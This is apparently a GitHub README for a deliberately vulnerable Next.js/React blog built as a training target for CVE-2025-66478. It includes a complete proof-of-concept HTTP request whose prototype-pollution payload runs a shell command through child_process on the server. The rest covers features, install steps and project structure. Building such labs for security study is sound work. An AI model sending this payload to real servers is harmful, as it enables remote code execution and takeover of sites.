Letalandroid/cve-2025-66478_rce_vulnerable

GitHub: Letalandroid/cve-2025-66478_rce_vulnerable

一个基于Next.js 16和React 19的故意存在CVE-2025-66478 RCE漏洞的博客应用靶场,专供安全研究和漏洞利用学习使用。

Stars: 0 | Forks: 0

# 使用 shadcn/ui 的现代博客 一个使用 Next.js 16、React 19、shadcn/ui 和 Tailwind CSS 构建的现代优雅博客。 # 重要提示: 这是一个**存在漏洞的 Next JS 项目**,仅出于教育、测试和漏洞利用目的创建,**不建议在生产环境中安装,仅限本地环境或受控环境使用** ## PoC ``` POST / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0 Next-Action: x X-Nextjs-Request-Id: b5dce965 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9 Content-Length: 740 ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name="0" { "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": { "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});", "_chunks": "$Q2", "_formData": { "get": "$1:constructor:constructor" } } } ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name="1" "$@0" ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name="2" [] ------WebKitFormBoundaryx8jO2oVc6SWP3Sad-- ``` 参考:[github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478](https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478) ## 功能特性 - 🎨 **现代设计**:使用 shadcn/ui 构建的优雅界面 - 📝 **完整博客**:包含多个模拟内容的博客文章 - 💬 **互动反应系统**:用不同的情绪(like、love、laugh、wow、sad、angry)对帖子做出反应 - 👤 **身份验证**:使用 localStorage 的注册和登录系统 - 🎯 **响应式**:完全响应式设计 - 🌙 **暗色模式**:支持自动暗色模式 ## 技术栈 - **Next.js 16** - React 框架 - **React 19** - UI 库 - **shadcn/ui** - 现代 UI 组件 - **Tailwind CSS 4** - 实用优先的样式工具 - **TypeScript** - 静态类型 - **Lucide React** - 图标 - **Radix UI** - 无障碍组件 ## 安装说明 1. 安装依赖: ``` npm install # o yarn install # o pnpm install ``` 2. 运行开发服务器: ``` npm run dev # o yarn dev # o pnpm dev ``` 3. 在浏览器中打开 [http://localhost:3000](http://localhost:3000)。 ## 项目结构 ``` ├── app/ # Páginas de Next.js │ ├── blog/[id]/ # Página de detalle del blog │ ├── profile/ # Página de perfil │ ├── layout.tsx # Layout principal │ └── page.tsx # Página principal ├── components/ # Componentes React │ ├── auth/ # Componentes de autenticación │ ├── blog/ # Componentes del blog │ ├── layout/ # Componentes de layout │ └── ui/ # Componentes shadcn/ui ├── lib/ # Utilidades y servicios │ ├── auth.ts # Servicio de autenticación │ ├── mocks.ts # Datos mock │ └── utils.ts # Utilidades generales └── public/ # Archivos estáticos ``` ## 功能 ### 身份验证 - 新用户注册 - 登录 - 存储在 localStorage - 用户个人资料 ### 博客 - 主页文章列表 - 每篇文章的详情页 - 作者信息 - 分类和标签 - 封面图片 ### 反应 - 查看帖子的所有反应 - 用不同情绪做出反应 - 各类反应计数 - 反应用户列表 ## 模拟数据 所有数据(博客、用户、反应)均为完全模拟数据,动态生成。不需要数据库。 ## 注意事项 - 用户凭据存储在 localStorage 中 - 每次页面刷新都会重新生成数据 - 反应系统仅供展示(不会持久化新的反应) ## 许可证 本项目仅用于教育目的。
标签:Child Process, CISA项目, CVE-2025-66478, Maven, MITM代理, OPA, PoC, RCE, React, Red Teaming, shadcn/ui, Syscalls, Tailwind CSS, XML 请求, 代码执行, 全栈安全, 前端安全, 原型污染, 安全开发, 恶意样本开发, 暴力破解, 服务端组件, 漏洞复现, 漏洞验证, 网络安全, 自动化攻击, 隐私保护, 靶场